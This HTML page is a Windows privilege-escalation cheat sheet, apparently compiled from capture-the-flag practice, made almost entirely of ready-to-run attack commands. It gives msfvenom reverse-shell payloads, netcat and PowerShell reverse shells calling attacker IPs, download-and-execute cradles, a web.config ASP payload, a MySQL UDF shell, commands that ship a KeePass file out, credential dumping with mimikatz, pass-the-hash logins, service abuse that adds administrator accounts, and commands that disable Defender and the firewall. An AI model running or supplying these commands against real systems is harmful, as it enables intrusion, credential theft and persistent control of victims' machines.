<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>CheatSheet</title>
</head><body><span style="font-size: 17pt">Windows Privilege Escalation Cheatsheet <br/>
</span><br/>
<b>Find OS Version:</b><br/>
<br/>
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"<br/>
<b><br/>
</b><b>Check for Privileges </b><br/>
<br/>
whoami /priv <br/>
<br/>
See the Services Running as NT Authority<br/>
<br/>
wmic service where started=true get name, startname<br/>
<br/>
<b>AlwaysInstall Elevated: </b><br/>
<br/>
Allows non-privileged users to run executables as SYSTEM<br/>
<br/>
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated <br/>
<br/>
<b>If Available:</b><br/>
msfvenom -p windows/adduser USER=bhanu PASS=bhanu123 -f msi -o create_user.msi<br/>
<b><br/>
</b><b>On target:</b><br/>
<br/>
msiexec /quiet /qn /i C:\create_user.msi<br/>
<br/>
<b>Metasploit</b>:<br/>
use exploit/windows/local/always_install_elevated<br/>
<br/>
<b>Scheduled Tasks:</b><br/>
<br/>
schtasks /query /fo LIST /v &nbsp; &nbsp; &nbsp; &nbsp;/Too much info<br/>
<br/>
<b>Running Windows Services</b><br/>
<br/>
net start <br/>
<br/>
Services Running on Localhost<br/>
netstat -ano <br/>
<br/>
netstat -an | find "LISTEN" <br/>
<br/>
<b>Using Plink:<br/>
</b><br/>
plink.exe -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward<br/>
<br/>
<br/>
Example: <br/>
plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389<br/>
<br/>
<br/>
<b><br/>
</b><b>Portforward using Meterpreter:</b><br/>
<br/>
portfwd add -l &lt;attacker port&gt; -p &lt;victim port&gt; -r &lt;victim ip&gt;<br/>
<br/>
portfwd add -l 3306 -p 3306 -r 192.168.1.101<br/>
<b><br/>
</b><b>Compiling 32-bit Exploits:</b><br/>
<br/>
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32<br/>
<br/>
<b>World Readable </b><br/>
<br/>
icacls "C:\Program Files\*" 2&gt;nul | findstr "(F)" | findstr "Everyone"<br/>
icacls "C:\Program Files (x86)\*" 2&gt;nul | findstr "(F)" | findstr "Everyone"<br/>
<br/>
icacls "C:\Program Files\*" 2&gt;nul | findstr "(F)" | findstr "BUILTIN\Users"<br/>
icacls "C:\Program Files (x86)\*" 2&gt;nul | findstr "(F)" | findstr "BUILTIN\Users" <br/>
<b>&nbsp;<br/>
<br/>
Autologon Registry<br/>
</b><br/>
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2&gt;nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"<br/>
&nbsp;<br/>
<br/>
<b>View Hidden Directories</b><br/>
<br/>
dir -Force<br/>
<br/>
<b>Poweshell Commands:</b><br/>
Get-ChildItem . -Force<br/>
gci -Force<br/>
ls -Force<br/>
<br/>
<b>Find Passwords in Registry</b><br/>
<br/>
# Windows autologin<br/>
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"<br/>
<br/>
# VNC<br/>
reg query "HKCU\Software\ORL\WinVNC3\Password"<br/>
reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly"<br/>
vncpwd.exe PASSWORD_FROM_ABOVE<br/>
<br/>
# SNMP Parameters<br/>
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"<br/>
<br/>
# Putty<br/>
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"<br/>
<br/>
# Search for password in registry<br/>
reg query HKLM /f password /t REG_SZ /s<br/>
reg query HKCU /f password /t REG_SZ /s<br/>
<br/>
<b>IIS Webserver - Hidden Files and Config Files </b><br/>
<br/>
dir /a C:\inetpub\<br/>
dir /s web.config<br/>
C:\Windows\System32\inetsrv\config\applicationHost.config<br/>
&nbsp;<br/>
<b><br/>
</b><b>Anything in Credential Manger </b><br/>
<br/>
cmdkey /list<br/>
dir C:\Users\username\AppData\Local\Microsoft\Credentials\<br/>
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\<br/>
&nbsp;<br/>
<b><br/>
</b><b>Check for Vulnerable Drivers</b><br/>
<br/>
DRIVERQUERY <br/>
<br/>
<b>Find Installed Paths</b><br/>
<br/>
wmic qfe get Caption,Description,HotFixID,InstalledOn<br/>
<br/>
Using Runas to run as Different User<br/>
<br/>
PsExec.exe -u hostname\username -p password "nc.exe TARGET_IP 443 -e cmd.exe"<br/>
<br/>
<br/>
C:\Windows\System32\runas.exe /env /noprofile /user:USERNAME PASSWORD "c:\users\Public\nc.exe -nc TARGET_IP 443 -e cmd.exe"<br/>
<br/>
<br/>
<b>Using Powershell:<br/>
</b><br/>
secpasswd = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force<br/>
mycreds = New-Object System.Management.Automation.PSCredential ("USERNAME", $secpasswd)<br/>
computer = "HOSTNAME"<br/>
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","&lt;attacker_ip&gt; 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)<br/>
<b><br/>
</b><b>TO run the Script:</b><br/>
<br/>
powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1<br/>
<br/>
<b>Can We Access SAM &amp; System Files</b><br/>
<br/>
%SYSTEMROOT%\repair\SAM<br/>
%SYSTEMROOT%\System32\config\RegBack\SAM<br/>
%SYSTEMROOT%\System32\config\SAM<br/>
%SYSTEMROOT%\repair\system<br/>
%SYSTEMROOT%\System32\config\SYSTEM<br/>
%SYSTEMROOT%\System32\config\RegBack\system<br/>
&nbsp;<br/>
<br/>
<b>Checking File Permissions using assesschk.exe</b><br/>
<br/>
accesschk.exe -qwsu "Everyone" *<br/>
accesschk.exe -qwsu "Authenticated Users" *<br/>
accesschk.exe -qwsu "Users" *<br/>
&nbsp;<br/>
<br/>
accesschk.exe -uwcqv "username" * &nbsp; / Check for RW permissions<br/>
<br/>
<b>Exploit</b>: <br/>
sc config daclsvc binpath= "net localgroup administrators bhanu /add "<br/>
sc start daclsvc<br/>
<br/>
<b>What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?<br/>
</b><br/>
tasklist /svc<br/>
tasklist /v<br/>
net start<br/>
sc query<br/>
&nbsp;<br/>
<br/>
<b>Always Install Elevated Privileges </b><br/>
<br/>
This the DWORD of these registries contain "AlwaysInstallElevated" which is set to "1", we can install any msi as &nbsp;NT Authrity\System<br/>
<br/>
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated<br/>
<br/>
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated<br/>
<br/>
OR<br/>
<br/>
reg qurey "HKLM\Software\Policies\Microsoft\Windows\Installer"<br/>
<br/>
reg qurey "HKCU\Software\Policies\Microsoft\Windows\Installer" <br/>
<br/>
<br/>
<b>Exploit:</b><br/>
<br/>
msfvenom -p windows/exec CMD='net localgroup administrators bhanu /add' -f msi-nouac -o exploit.msi<br/>
<br/>
on Target: msiexec /quiet /qn /i C:\temp\exploit.msi<br/>
<br/>
<b>Scheduled Tasks</b><br/>
<br/>
schtasks /query /fo LIST 2&gt;nul | findstr TaskName<br/>
dir C:\windows\tasks<br/>
<br/>
<b>Powershell:</b><br/>
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State<br/>
<br/>
<b>Unquoted Service Paths - can be exploited - use PowerUP</b><br/>
<br/>
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """<br/>
<br/>
OR<br/>
<br/>
wmic service get name,displayname,pathname,startmode 2&gt;nul |findstr /i "Auto" 2&gt;nul |findstr /i /v "C:\Windows\\" 2&gt;nul |findstr /i /v """<br/>
<br/>
OR <br/>
sc query state= all | findstr "SERVICE_NAME:" &gt;&gt; a &amp; FOR /F "tokens=2 delims= " %i in (a) DO @echo %i &gt;&gt; b &amp; FOR /F %i in (b) DO @(@echo %i &amp; @echo --------- &amp; @sc qc %i | findstr "BINARY_PATH_NAME" &amp; @echo.) &amp; del a 2&gt;nul &amp; del b 2&gt;nul<br/>
<br/>
<b>Powershell:</b><br/>
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name<br/>
<b><br/>
</b><b>Juicy Potato Exploit - SeImpersonatePrivilege Enabled</b><br/>
<br/>
JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}<br/>
<br/>
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=443 -f exe -o reverse.exe<br/>
<br/>
./jp.exe -l 1345 -p c:\windows\temp\reverse.exe &nbsp;-t * <br/>
<br/>
<b>Operating System information is found in</b><br/>
<br/>
C:\Windows\System32\license.rtf &nbsp;--&gt; windows 7<br/>
C:\Windows\System32\eula.txt &nbsp; &nbsp; --&gt; windows xp <br/>
<br/>
<b>Decrypt GPP Policy from Groups.xml </b><br/>
<br/>
Groups.xml:<br/>
<br/>
get-content "C:\programdata\Microsoft\group policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"<br/>
<br/>
&lt;?xml version="1.0" encoding="UTF-8" ?&gt;&lt;Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"&gt;<br/>
&lt;User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1"&gt;<br/>
&lt;Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"&gt;&lt;/Properties&gt;&lt;/User&gt;&lt;/Groups&gt;<br/>
<br/>
<br/>
gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ <br/>
<br/>
<b>Check for Installed Patches </b><br/>
<br/>
wmic qfe get Caption,Description,HotFixID,InstalledOn <br/>
<br/>
<b>Using Sherlock To Check Vulns </b><br/>
<br/>
certutil -f -split -urlcache http://10.10.10.10/sherlock.ps1<br/>
<br/>
poweshell -nop -ep bypass<br/>
<br/>
Import-Module .\sherlock.ps1<br/>
<br/>
Find-AllVulns<br/>
<br/>
<b>Check these Config Files - Might contain Password</b><br/>
<br/>
type c:\windows\Panther\Untattended.xml &nbsp;\\Find Base64 password<br/>
type "c:\ProgamData\McAfee\Common Framework\SiteList.xml" \\Find Base64 password<br/>
<br/>
c:\sysprep.inf<br/>
c:\sysprep\sysprep.xml<br/>
%WINDIR%\Panther\Unattend\Unattended.xml<br/>
%WINDIR%\Panther\Unattended.xml <br/>
<br/>
<b>Priv Esc using a Service running as root:</b><br/>
------------------------------------------<br/>
<br/>
services.msc<br/>
select a service, which u think might be vulnerable and go to the file's location in cmd<br/>
<br/>
icacls scsiaccess.exe &nbsp;/if Everyone is present, we can exploit it by replacing the original file by our file<br/>
<br/>
<b>in Kali: Lets create an exploit code for it :) </b><br/>
----------<br/>
nano useradd.c <br/>
<br/>
#include&lt;stdlib.h&gt;<br/>
int main()<br/>
{<br/>
int i;<br/>
i=system("net localgroup administrators username /add");<br/>
return 0;<br/>
}<br/>
<br/>
ctrl +x --&gt; y<br/>
<br/>
i586-mingw32msv-gcc useradd.c -o useradd.exe<br/>
<br/>
copy this useradd.exe to the target machine and name it as scsiaccess.exe<br/>
<br/>
<b>restart the machine/service :)</b><br/>
<br/>
services.msc<br/>
scsiaccess.exe --&gt; right click --&gt; restart<br/>
&nbsp;<br/>
<b><br/>
</b><b>Powershell Sudo For Windows</b><br/>
<br/>
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force<br/>
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw<br/>
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"<br/>
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &amp;{Start-Process $script -verb Runas}' <br/>
<br/>
powershell -ExecutionPolicy Bypass -File xyz.ps1<br/>
<br/>
<b>Disable Firewall/Defender and Enable RDP for all Users<br/>
</b><br/>
sc stop WinDefend<br/>
netsh advfirewall show allprofiles<br/>
netsh advfirewall set allprofiles state off<br/>
netsh firewall set opmode disable<br/>
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f<br/>
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f<br/>
<b><br/>
Downloading Files with bitsadmin<br/>
</b><br/>
bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;attackerIP&gt;/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe<br/>
<br/>
<b>PsExec Shell for Remote Systems</b><br/>
<br/>
.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe<br/>
<br/>
<b>Search for keyword "pass,cred,vnc and config"</b><br/>
<br/>
dir /s *pass* == *cred* == *vnc* == *.config*<br/>
<br/>
<b>search files with keyword "Password" in .xml,ini,.txt files </b><br/>
<br/>
findstr /si password *.xml *.ini *.txt<br/>
<br/>
<b>Grep Registry for "Password" Keyword</b><br/>
<br/>
reg query HKLM /f password /t REG_SZ /s<br/>
reg query HKCU /f password /t REG_SZ /s<br/>
<b><br/>
</b><b>Finding Services with incorrect permissions:</b><br/>
<br/>
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a &gt;&gt; c:\windows\temp\permissions.txt<br/>
<br/>
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"<br/>
<br/>
<br/>
<b>If wmic is not availale - try sc</b><br/>
sc query state= all | findstr "SERVICE_NAME:" &gt;&gt; Servicenames.txt<br/>
FOR /F %i in (Servicenames.txt) DO echo %i<br/>
type Servicenames.txt<br/>
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i &gt;&gt; services.txt<br/>
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" &gt;&gt; path.txt<br/>
<b><br/>
</b><b>Windows XP Priv Esc - Incorrect Permission in Services</b><br/>
<br/>
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.48 9002 -e C:\WINDOWS\System32\cmd.exe"<br/>
<br/>
<b>OR - run all the below commands together to create an Administrator account<br/>
</b><br/>
sc config SSDPSRV start= auto<br/>
net start SSDPSRV<br/>
net start upnphost<br/>
<br/>
<br/>
sc config upnphost binpath= "net user bhanu bhanu123 /add"<br/>
sc config upnphost obj= ".\LocalSystem" password= ""<br/>
sc qc upnphost<br/>
net start upnphost<br/>
<br/>
sc config upnphost binpath= "net localgroup administrators bhanu /add "<br/>
sc config upnphost obj= ".\LocalSystem" password= ""<br/>
sc qc upnphost<br/>
net start upnphost<br/>
<br/>
sc config upnphost binpath= "reg add 'hklm\system\currentcontrolset\control\terminal server' /f /v fDenyTSConnections /t REG_DWORD /d 0 "<br/>
sc config upnphost obj= ".\LocalSystem" password= ""<br/>
sc qc upnphost<br/>
net start upnphost<br/>
<br/>
sc config upnphost binpath= "netsh firewall set service remoteadmin enable &nbsp;"<br/>
sc config upnphost obj= ".\LocalSystem" password= ""<br/>
sc qc upnphost<br/>
net start upnphost<br/>
<br/>
sc config upnphost binpath= "netsh firewall set service remotedesktop enable"<br/>
sc config upnphost obj= ".\LocalSystem" password= ""<br/>
sc qc upnphost<br/>
net start upnphost<br/>
<br/>
<br/>
<b>in Kali:</b><br/>
rdesktop IP_Address<br/>
<br/>
<b>IIS HTTP 6.0 Exploit </b><br/>
<br/>
<b>No Proper Input Validation, So change your exploit to </b><br/>
<br/>
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f asp -o payload.html<br/>
<br/>
move payload.html payload.asp;.html<br/>
<br/>
Priv Esc From NT Authrity Service to NT Authority System<br/>
<br/>
<br/>
<b>Windows Server 2003 -- NT Authority Service to System <br/>
<br/>
</b><b>Download and copy the exploit to target machine </b><br/>
<br/>
https://www.exploit-db.com/exploits/6705<br/>
<br/>
Github <br/>
<br/>
Exploiting IIS 6 with ASP .NET<br/>
<br/>
copy churrasco.exe c:\windows\temp\<br/>
<br/>
churrasco.exe -d "net users /add bhanu bhanu123"<br/>
<br/>
churrasco.exe -d "net localgroup administrators bhanu /add"<br/>
<br/>
churrasco.exe -d “reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0”<br/>
<br/>
churrasco.exe -d "netsh firewall set service remoteadmin enable"<br/>
<br/>
churrasco.exe -d “netsh firewall set service remotedesktop enable”<br/>
<br/>
Might be Helpful - Rotten Potato<br/>
<br/>
Exploiting IIS httpd 7.5<br/>
<br/>
<b>You need to add the following code at the end of web.config file and upload it into the server and get a reverse shell using it. reverse shell should be in winrevshell.ps1 file; a file sharing server should be turned on as well. </b><br/>
<br/>
&lt;%<br/>
Set s = CreateObject("WScript.Shell")<br/>
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')")<br/>
o = cmd.StdOut.Readall()<br/>
Response.write(o)<br/>
%&gt; <br/>
<br/>
<b>Sample Web.config file with Exploit</b><br/>
<br/>
&lt;?xml version="1.0" encoding="UTF-8"?&gt;<br/>
&lt;configuration&gt;<br/>
&nbsp; &nbsp;&lt;system.webServer&gt;<br/>
&nbsp; &nbsp; &nbsp; &lt;handlers accessPolicy="Read, Script, Write"&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /&gt; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
&nbsp; &nbsp; &nbsp; &lt;/handlers&gt;<br/>
&nbsp; &nbsp; &nbsp; &lt;security&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;requestFiltering&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;fileExtensions&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;remove fileExtension=".config" /&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/fileExtensions&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;hiddenSegments&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;remove segment="web.config" /&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/hiddenSegments&gt;<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;/requestFiltering&gt;<br/>
&nbsp; &nbsp; &nbsp; &lt;/security&gt;<br/>
&nbsp; &nbsp;&lt;/system.webServer&gt;<br/>
&lt;/configuration&gt;<br/>
<br/>
&lt;%<br/>
Set s = CreateObject("WScript.Shell")<br/>
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')")<br/>
o = cmd.StdOut.Readall()<br/>
Response.write(o)<br/>
%&gt; <br/>
<br/>
<b>Mysql Running as Root<br/>
<br/>
Download the UDF file from Here<br/>
<br/>
</b><b>Tutorial is here</b><br/>
<b><br/>
</b>use mysql;<br/>
create table potato(line blob);<br/>
insert into potato values(load_file('/tmp/lib_mysqludf_sys.so'));<br/>
select * from potato into dumpfile '/usr/lib/lib_mysqludf_sys.so';<br/>
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';<br/>
select sys_exec('bash -i &gt;&amp; /dev/tcp/IP_ADDRESS/443 0&gt;&amp;1');<br/>
<br/>
<br/>
<b>OR try the automated script<br/>
</b><b>Github Exploit &nbsp;Video Tutorial &nbsp;</b><br/>
<br/>
Meterpreter ASP Reverse Shell or Windows<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.11.0.48 LPORT=9001 -f asp &gt; shell.asp<br/>
<b><br/>
</b><b>Dumping Credentials using mimikatz</b><br/>
<br/>
mimikatz.exe <br/>
<br/>
privilege::debug &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;/You should see 200 OK<br/>
<br/>
sekurlsa::logonpasswords &nbsp; &nbsp; /dump creds and other info<br/>
<b><br/>
</b><b>Current User:</b><br/>
<br/>
whoami /all<br/>
<br/>
<b>List out all Users:</b><br/>
<br/>
net user<br/>
<br/>
<b>Add a user:</b><br/>
<br/>
net user maven maven123 /add<br/>
<br/>
<b>Adding a user to Administrators Group:</b><br/>
<br/>
net localgroup administrators maven /add<br/>
<br/>
<b>Remove a user:</b><br/>
<br/>
net user maven /del<br/>
<br/>
<b>Check for Active Users using Powershell:</b><br/>
<br/>
powershell -Command (get-wmiobject win32_useraccount<br/>
<br/>
<b>View Hidden Directories:</b><br/>
<br/>
dir -Force<br/>
<br/>
dir /R<br/>
<b><br/>
</b><b>Get a Proper Windows Shell:</b><br/>
<br/>
apt-get install rlwrap <br/>
<br/>
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")<br/>
<br/>
rlwrap nc -nvlp 9001<br/>
<br/>
Hot Potato - Exploit <br/>
<br/>
<b>Importing a Powershell Exploit and execute it</b>&nbsp;<br/>
<br/>
powershell -ep bypass -nop <br/>
Import-Module .\Tater.ps1<br/>
Invoke-Tater -Trigger 1 -Command "net users \add bhanu"Invoke-Tater -Trigger 1 -Command "net localgroup administrators bhanu /add"<br/>
<br/>
<b>Download and Execute a Reverse Shell</b><br/>
<br/>
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")<br/>
python -m SimpleHTTPServer 8001<br/>
<br/>
nc -nvlp 9001<br/>
<br/>
#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1<br/>
<br/>
Change ACL for a file <br/>
<br/>
cacls “C:\Users\Administrator\Desktop\root.txt” /E /P Alfred:F<br/>
<br/>
<b>cacls Windows utility to view/edit file permissions </b><br/>
/E to edit ACL <br/>
/P to set permissions <br/>
Alfred:F to give Alfred full control of the file<br/>
<br/>
<b>Add this to Cron Jobs To get a Shell</b><br/>
<br/>
&nbsp;echo "IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/rev9002.ps1')" &gt; cronjob_FileName.ps1 <br/>
<br/>
<b>Logging in with NTLM hashes </b><br/>
<br/>
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe<br/>
<br/>
<b>Create RDP Access on a Target Machine<br/>
<br/>
</b><b>Useful when you have remote code execution</b>&nbsp;<br/>
<br/>
net user /add maven maven123 &nbsp;/Create an account named Maven <br/>
<br/>
net localgroup administrators maven /add &nbsp; Assign Admin Privs &nbsp;<br/>
<br/>
<br/>
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 &nbsp; &nbsp;Start RDP Service <br/>
<br/>
netsh firewall set service remoteadmin enable <br/>
<br/>
netsh firewall set service remotedesktop enable<br/>
<br/>
<br/>
<b><br/>
</b><b>On kali:</b><br/>
rdesktop 10.10.10.10<br/>
<br/>
<b><br/>
{Metasploit} Login with NTML Pass hases into a Windows machine<br/>
</b><br/>
use exploit/windows/smb/psexec<br/>
set rhost 10.10.10.10<br/>
set smbuser administrator<br/>
set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00<br/>
set lport 8888<br/>
exploit<br/>
<br/>
<br/>
run getgui -e &nbsp; &nbsp;/Enable RDP on Target<br/>
shell<br/>
net user administrator password<br/>
<b><br/>
</b><b>on Kali:</b><br/>
rdesktop 10.10.10.10<br/>
administrator password<br/>
<br/>
<br/>
<b>Check for Hidden Files:</b><br/>
&nbsp;get-content .\root.txt -stream *<br/>
&nbsp;get-content .\root.txt -stream root.txt<br/>
<br/>
<b>Run as admin with prev saved cred</b><br/>
<br/>
runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt &gt; C:\users\security\root.txt<br/>
<br/>
<br/>
<b>File transfer using Certutil.exe</b><br/>
<br/>
certutil.exe -urlcache -split -f http://10.10.14.6/sherlock.ps1 sherlock.ps1<br/>
<br/>
<br/>
<b>Priv Esc (getting Root) using Metasploit</b><br/>
<br/>
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.6 LPORT=9003 –platform win -a x64 -f exe &gt; shell.exe<br/>
<br/>
<br/>
certutil -urlcache -f http://10.10.14.6:8001/shell.exe shell.exe<br/>
<br/>
<br/>
msfconsole<br/>
use exploit/multi/handler<br/>
set payload windows/x64/meterpreter_reverse_tcp <br/>
set lport 9003<br/>
set lhost 10.10.14.6<br/>
<br/>
run<br/>
run post/multi/recon/local_exploit_suggester<br/>
background<br/>
*********** use exploit/local/EXPLPOIT-SUGGESTED************<br/>
set lport 9004<br/>
set lhost 10.10.14.6<br/>
run <br/>
getuid<br/>
<br/>
<br/>
<b>Transfer Files Using FTP Service</b><br/>
<br/>
echo open 10.10.14.19&gt;ftp_commands.txt&amp;echo anonymous&gt;&gt;ftp_commands.txt&amp;echo password&gt;&gt;ftp_commands.txt&amp;echo binary&gt;&gt;ftp_commands.txt&amp;echo get ms15.exe&gt;&gt;ftp_commands.txt&amp;echo bye&gt;&gt;ftp_commands.txt&amp;ftp -s:ftp_commands.txt <br/>
<br/>
python -m pyftpdlib -p 21<br/>
<br/>
Transfer Files &amp; Getting Root Shell<br/>
<br/>
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8001/shell.exe', 'shell.exe')<br/>
<br/>
<br/>
<b>Create Exploit:</b><br/>
<br/>
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe<br/>
<br/>
<br/>
python -m SimplerHTTPServer 8001<br/>
<br/>
dir | findstr shell<br/>
<br/>
runas /user:Administrator /noprofile /savecred "cmd.exe /c shell.exe<br/>
<br/>
Transfer Files &amp; Getting Root Shell Building the Payload: /usr/share/nishang/Shells/Invoke-PowershellTcp.ps1 &nbsp; already available on kali, if not Download from here. <br/>
<br/>
<br/>
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 9001 &gt;&gt; Invoke-PowershellTcp.ps1<br/>
<br/>
python -m SimpleHTTPServer 8001 &nbsp;<br/>
<br/>
<b>Transferring the Payload:</b><br/>
<br/>
cd C:\Users\security\AppData\Local\Temp\<br/>
<br/>
certutil -f split -urlcache http://10.10.10.10:8001/Invoke_powershellTcp.ps1<br/>
<br/>
<br/>
<b>Run As Admin:</b><br/>
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"<br/>
<br/>
nc nvlp 9001<br/>
<br/>
<b><br/>
<br/>
</b><b><span style="font-size: 16pt">Useful Powershell Commands </span></b><br/>
<br/>
<b>Download a File using Power Shell:</b><br/>
<br/>
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')<br/>
<br/>
<b>Download a File Using Power Shell:</b><br/>
<br/>
nc.exe 10.10.10.10 8002 &lt; CEH.kdbx<br/>
<br/>
<b>Execute a Command in Java Shell</b><br/>
<br/>
def cmd = "cmd.exe /c dir".execute();<br/>
println("${cmd.text}");<br/>
<br/>
<b>Execute a Command in Java Shell</b><br/>
<br/>
println "cmd.exe /c dir".execute().text<br/>
<br/>
<b>Upload a file using Power shell: in a java shell</b><br/>
<br/>
def process = "powershell -command Invoke-WebRequest 'http://10.10.10.10:8001/nc.exe' -OutFile nc.exe".execute();<br/>
println("${process.text}");<br/>
<br/>
<b>Get a Reverse Shell using Powershell</b><br/>
<br/>
def process = "powershell -command ./nc.exe 10.10.10.10 9001 -e cmd.exe".execute(); <br/>
println("${process.text}");<br/>
<br/>
nc.exe should be in the same directory; use the above command to download it. <br/>
<br/>
<b>Check for Hidden Files</b><br/>
<br/>
&nbsp;get-content .\root.txt -stream *<br/>
<br/>
&nbsp;get-content .\root.txt -stream root.txt<br/>
<br/>
<br/>
<b>Download and Execute Powershell Script on Victim Machine</b><br/>
<br/>
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")<br/>
<br/>
python -m SimpleHTTPServer 8001<br/>
<br/>
nc -nvlp 9001<br/>
<br/>
